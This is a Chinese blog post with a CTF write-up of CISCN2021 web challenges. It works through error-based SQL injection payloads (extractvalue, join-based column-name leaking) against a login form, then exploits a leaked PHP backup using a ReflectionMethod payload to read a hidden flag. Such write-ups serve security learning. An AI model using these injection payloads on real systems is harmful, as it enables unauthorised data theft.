<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>CISCN2021赛后复现 | At的小站</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Webesay_sql输入单引号报错 123uname&#x3D;admin&amp;passwd&#x3D;123456&amp;#x27;&amp;Submit&#x3D;%E7%99%BB%E5%BD%95#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for th">
<meta property="og:type" content="article">
<meta property="og:title" content="CISCN2021赛后复现">
<meta property="og:url" content="https://swhat.github.io/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="At的小站">
<meta property="og:description" content="Webesay_sql输入单引号报错 123uname&#x3D;admin&amp;passwd&#x3D;123456&amp;#x27;&amp;Submit&#x3D;%E7%99%BB%E5%BD%95#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for th">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/4903b7830329ec519a9add06ecbd160d.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/b33f074e5d8a9425d7463e89e4510ba4.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210516141112739.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210516141137899.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210521203038633.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021052120570322.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210521211621458.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210521211307860.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210521225101522.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210521214939316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2021-05-21T14:26:42.000Z">
<meta property="article:modified_time" content="2021-08-15T03:59:06.416Z">
<meta property="article:author" content="Atkx">
<meta property="article:tag" content="Write up">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/img_convert/4903b7830329ec519a9add06ecbd160d.png">
  
    <link rel="alternative" href="/atom.xml" title="At的小站" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/atkx_16x16.png">
  
  
      
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 5.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/atkx.png" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate"></a></h1>
        </hgroup>

        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/Home">博客首页</a></li>
                        
                            <li><a href="/works">作品展示</a></li>
                        
                            <li><a href="/about">留言打卡</a></li>
                        
                            <li><a href="/FrontEndGuide">前端导航</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="https://github.com/swhat" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/AWD/" style="font-size: 10px;">AWD</a> <a href="/tags/CTFhub/" style="font-size: 16px;">CTFhub</a> <a href="/tags/CTFshow/" style="font-size: 10px;">CTFshow</a> <a href="/tags/Dcoker/" style="font-size: 14px;">Dcoker</a> <a href="/tags/MISC/" style="font-size: 10px;">MISC</a> <a href="/tags/MYSQL/" style="font-size: 10px;">MYSQL</a> <a href="/tags/PHP/" style="font-size: 18px;">PHP</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">SQL注入</a> <a href="/tags/SSTI/" style="font-size: 10px;">SSTI</a> <a href="/tags/Struts2/" style="font-size: 14px;">Struts2</a> <a href="/tags/Write-up/" style="font-size: 20px;">Write up</a> <a href="/tags/XXE/" style="font-size: 10px;">XXE</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">代码审计</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/" style="font-size: 12px;">信息泄露</a> <a href="/tags/%E5%8D%8F%E8%AE%AE%E5%9F%BA%E7%A1%80/" style="font-size: 10px;">协议基础</a> <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 10px;">命令执行</a> <a href="/tags/%E6%90%AD%E5%BB%BA%E5%8D%9A%E5%AE%A2/" style="font-size: 10px;">搭建博客</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 12px;">文件上传</a> <a href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" style="font-size: 12px;">流量分析</a> <a href="/tags/%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">漏洞</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 10px;">漏洞复现</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://swhat.github.io/">name</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">CTF小白</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/atkx.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/Home">博客首页</a></li>
                
                    <li><a href="/works">作品展示</a></li>
                
                    <li><a href="/about">留言打卡</a></li>
                
                    <li><a href="/FrontEndGuide">前端导航</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/swhat" title="github">github</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-CISCN2021赛后复现" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/" class="article-date">
      <time datetime="2021-05-21T14:26:42.000Z" itemprop="datePublished">2021-05-21</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CISCN2021赛后复现
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/CTF/">CTF</a><a class="article-category-link" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/">比赛复现</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Write-up/" rel="tag">Write up</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
         <a id="more"></a>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="esay-sql"><a href="#esay-sql" class="headerlink" title="esay_sql"></a>esay_sql</h2><p>输入单引号报错</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#x27;</span><span class="hljs-string">&#x27;123456&#x27;</span><span class="hljs-string">&#x27;) LIMIT 0,1&#x27;</span> at line <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/img_convert/4903b7830329ec519a9add06ecbd160d.png" alt="image-20210515182436750"><br>sqlmap跑了一下，可以使用报错注入</p>
<p>1.爆库名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,database(),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#XPATH syntax error: &#x27;</span>~security~<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p>2.爆表名</p>
<p>猜测表名为flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,(select * from flag),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#Operand should contain 1 column(s)</span><br></code></pre></td></tr></table></figure>
<p>3.爆列名</p>
<p>过滤了information_schema函数，可以使用join 无列名注入</p>
<p>得到id列</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag )b),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#Duplicate column name &#x27;</span>id<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p>得到no列</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id))b),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#Duplicate column name &#x27;</span>no<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p>得到ea1235fa-d397-474b-8188-dedbe352ffc7列</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id,no))b),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#Duplicate column name &#x27;</span>ea1235fa-d397<span class="hljs-number">-474</span>b<span class="hljs-number">-8188</span>-dedbe352ffc7<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p>4.爆值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,(select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#XPATH syntax error: &#x27;</span>~CISCN&#123;tJ1mc-jgoXW-qiG07-oHt4u-s<br></code></pre></td></tr></table></figure>



<p>因为报错注入限制只能读取一半flag，用right读取右半部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">uname=admin&amp;passwd=<span class="hljs-number">123456</span><span class="hljs-string">&#x27;)and extractvalue(1,concat(0x7e,right((select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),20),0x7e))--+&amp;Submit=%E7%99%BB%E5%BD%95</span><br><span class="hljs-string"></span><br><span class="hljs-string">#XPATH syntax error: &#x27;</span>~-qiG07-oHt4u-shqSb-&#125;~<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b33f074e5d8a9425d7463e89e4510ba4.png" alt="image-20210515184620854"><br>消去重复部分，最终flag为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">CISCN&#123;tJ1mc-jgoXW-qiG07-oHt4u-shqSb-&#125;<br></code></pre></td></tr></table></figure>
<h2 id="easy-source"><a href="#easy-source" class="headerlink" title="easy_source"></a>easy_source</h2><p>一道原题，参考<a target="_blank" rel="noopener" href="https://r0yanx.com/2020/10/28/fslh-writeup/">wp</a>复现的<br>题目描述：你知道开发一个php程序很重要的东西是什么吗（flag在你看不到的地方）</p>
<p>最重要的就是备份，访问.index.php.swo得到源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><code class="hljs php">本题目没有其他代码了噢，就只有这一个文件，虽然你看到的不完全，但是你觉得我会把flag藏在哪里呢，仔细想想文件里面还有什么？<br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">User</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$c</span> = <span class="hljs-number">0</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">a</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">b</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">c</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">d</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">e</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">f</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">g</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">h</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">i</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">j</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">k</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">l</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">m</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">n</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">o</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">p</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">q</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">r</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">s</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">t</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>    &#125;<br>    <br>&#125;<br><br><span class="hljs-variable">$rc</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;rc&quot;</span>];<br><span class="hljs-variable">$rb</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;rb&quot;</span>];<br><span class="hljs-variable">$ra</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;ra&quot;</span>];<br><span class="hljs-variable">$rd</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;rd&quot;</span>];<br><span class="hljs-variable">$method</span>= <span class="hljs-keyword">new</span> <span class="hljs-variable">$rc</span>(<span class="hljs-variable">$ra</span>, <span class="hljs-variable">$rb</span>);<br>var_dump(<span class="hljs-variable">$method</span>-&gt;<span class="hljs-variable">$rd</span>());<br></code></pre></td></tr></table></figure>
<p>根据提示，本题就这一个文件，而且提示看到的不完全，猜测 flag被注释了，而且在类中被注释了。</p>
<p>需要GET提交四个参数，可以实例化任意类，并调用类方法。利用 PHP内置类中的 ReflectionMethod 来读取 User 类里面各个函数的注释</p>
<p>本地测试：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">User</span></span><br><span class="hljs-class"></span>&#123;<br>	<span class="hljs-keyword">private</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$c</span> = <span class="hljs-number">0</span>;<br>	<span class="hljs-comment">//pubLic $b = 100;</span><br>	<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">a</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">	</span>&#123;<br>		<span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>	&#125;<br>	<span class="hljs-comment">/**</span><br><span class="hljs-comment">	 * Increment counter</span><br><span class="hljs-comment">	 *</span><br><span class="hljs-comment">	 * <span class="hljs-doctag">@final</span></span><br><span class="hljs-comment">	 * <span class="hljs-doctag">@static</span></span><br><span class="hljs-comment">	 * <span class="hljs-doctag">@access</span>  publicCISCN&#123;test&#125;</span><br><span class="hljs-comment">	 * <span class="hljs-doctag">@return</span>  int</span><br><span class="hljs-comment">	 */</span><br>	<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">b</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">	</span>&#123;<br>		<span class="hljs-keyword">return</span> ++<span class="hljs-built_in">self</span>::<span class="hljs-variable">$c</span>;<br>	&#125;<br>&#125;<br><span class="hljs-variable">$d</span> = <span class="hljs-keyword">new</span> ReflectionMethod(<span class="hljs-string">&#x27;User&#x27;</span>, <span class="hljs-string">&#x27;b&#x27;</span>);<br>var_dump(<span class="hljs-variable">$d</span>-&gt;getDocComment());<br><br></code></pre></td></tr></table></figure>
<p>运行结果如下：<br><img src="https://img-blog.csdnimg.cn/20210516141112739.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>源码中有26个函数，flag在某个函数的注释中，构造Payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?rc=ReflectionMethod&amp;ra=User&amp;rb=a&amp;rd=getDocComment<br></code></pre></td></tr></table></figure>
